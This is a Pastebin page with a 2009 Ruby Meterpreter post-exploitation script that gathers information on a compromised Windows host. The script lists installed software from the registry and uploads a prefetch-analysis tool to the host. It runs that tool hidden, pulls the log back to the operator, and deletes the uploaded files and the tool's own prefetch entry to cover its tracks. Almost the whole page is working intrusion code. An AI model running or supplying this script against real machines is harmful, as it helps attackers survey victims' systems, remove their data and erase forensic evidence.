Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

milo

By: a guest on Oct 22nd, 2009  |  syntax: Ruby  |  size: 5.01 KB  |  views: 316  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/env ruby
  2. #Meterpreter script for extracting information from windows prefetch folder
  3. #Provided by Milo at keith.lee2012[at]gmail.com
  4. #Verion: 0.1.0
  5. session = client
  6. host,port = session.tunnel_peer.split(':')
  7.  
  8. # Script Options
  9. exec_opts = Rex::Parser::Arguments.new(
  10.         "-h" => [ false,  "Help menu."],
  11.                 "-p" => [ false,  "List Installed Programs"],                
  12.                 "-c" => [ false,  "Disable SHA1/MD5 checksum"],                
  13.                 "-x" => [ true,   "Top x Accessed Executables (Based on Prefetch folder)"],                
  14.                 "-d" => [ false,  "Disable lookup for software name"],
  15.                 "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
  16.                 )
  17. tmp = session.fs.file.expand_path("%TEMP%")
  18. imgname = sprintf("%.5d",rand(100000))
  19. runTop = nil
  20. logs = ''
  21. logs1 = ''
  22.  
  23. timeoutsec = 1000
  24. #---------------------------------------------------------------------------------------------------------
  25. def readprogramlist(session)
  26.         begin
  27.         key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
  28.         sfmsvals = key.enum_key
  29.         sfmsvals.each do |test1|
  30.                 begin                  
  31.                         key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
  32.                         root_key2, base_key2 = session.sys.registry.splitkey(key2)
  33.                         value1 = "DisplayName"
  34.                         value2 = "DisplayVersion"
  35.                         open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
  36.                         v1 = open_key.query_value(value1)
  37.                         v2 = open_key.query_value(value2)
  38.                         print_status("#{v1.data}\t(Version:  #{v2.data})")
  39.                 rescue
  40.                 end
  41.         end
  42.         end
  43. end
  44.  
  45. def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
  46.         tmpout = []
  47.         prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
  48.         prefetchlog = sprintf("%.5d",rand(100000))
  49.         print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
  50.         begin
  51.                 session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
  52.                 print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
  53.         rescue::Exception => e
  54.                         print_status("The following Error was encountered: #{e.class} #{e}")
  55.         end
  56.         session.response_timeout=timeoutsec
  57.         if logs1!=''
  58.                 session = client
  59.                 host,port = session.tunnel_peer.split(':')
  60.                 logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
  61.                 ::FileUtils.mkdir_p(logs)
  62.                 print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
  63.         end
  64.  
  65.         begin
  66.                 r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
  67.                 while(d = r.channel.read)
  68.                         print_status d
  69.                 end
  70.                 sleep(2)
  71.                 prog2check = "#{prefetchlog}.exe"
  72.                 found = 0
  73.                 while found == 0
  74.                         session.sys.process.get_processes().each do |x|
  75.                                 found =1
  76.                                 if prog2check == (x['name'].downcase)
  77.                                         print "."
  78.                                         sleep(0.5)
  79.                                         found = 0
  80.                                 end
  81.                         end
  82.                 end
  83.                 r.channel.close
  84.                 r.close
  85.                 print "\n"
  86.                 if logs1!=""
  87.                         print_status("Finish extracting prefetch folder data")
  88.                 end
  89.                 print_status("Deleting #{prefetchlog}.exe from target...")
  90.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
  91.                 session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
  92.                 print_status("Clearing prefetch-tool prefetch entry ...")
  93.         rescue::Exception => e
  94.                         print_status("The following error was encountered: #{e.class} #{e}")
  95.         end
  96.         return logs
  97. end
  98. #---------------------------------------------------------------------------------------------------------
  99. def logdown(session,tmp,imgname,logs,timeoutsec)
  100.         session.response_timeout=timeoutsec
  101.         print_status("Downloading prefetch-tool logs to #{logs}")
  102.         begin
  103.                 session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
  104.                 print_status("Finished downloading prefetch-tool log")
  105.                 print_status("Deleting left over files...")
  106.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  107.                 print_status("Prefetch-tool log on target deleted")
  108.         rescue::Exception => e
  109.                         print_status("The following Error was encountered: #{e.class} #{e}")
  110.         end
  111. end
  112.  
  113. ################## MAIN ##################
  114. # Parsing of Option
  115. checksum = 1
  116. inetlookup = 1
  117. hlp = 0
  118. dwld = 0
  119. options1 = ""
  120. viewPrograms = 0
  121.  
  122. exec_opts.parse(args) { |opt, idx, val|
  123.         case opt
  124.         when "-x"
  125.                 options1 += " --x="+val
  126.         when "-c"
  127.                 options1 += " --disable-md5 --disable-sha1"
  128.         when "-p"
  129.                 viewPrograms = 1       
  130.                 hlp = 1
  131.         when "-d"
  132.                 options1 += " --disable-lookup"
  133.         when "-l"
  134.                 logs1 = " --txt=#{tmp}\\#{imgname}"
  135.                 dwld = 1
  136.         when "-h"
  137.                 hlp = 1
  138.                 print(
  139.                 "Prefetch-tool Meterpreter Script\n" +
  140.                 @@exec_opts.usage                      
  141.                 )
  142.                 break
  143.         end
  144. }
  145. if (viewPrograms == 1)
  146.         readprogramlist(session)
  147. end
  148.  
  149. if (hlp == 0)
  150.         print_status("Running Prefetch-tool Script.....")
  151.         logs2 = prefetchdump(session,tmp,imgname,options1,logs1,timeoutsec)
  152.         if (dwld == 1)
  153.                 logdown(session,tmp,imgname,logs2,timeoutsec)
  154.         end
  155. end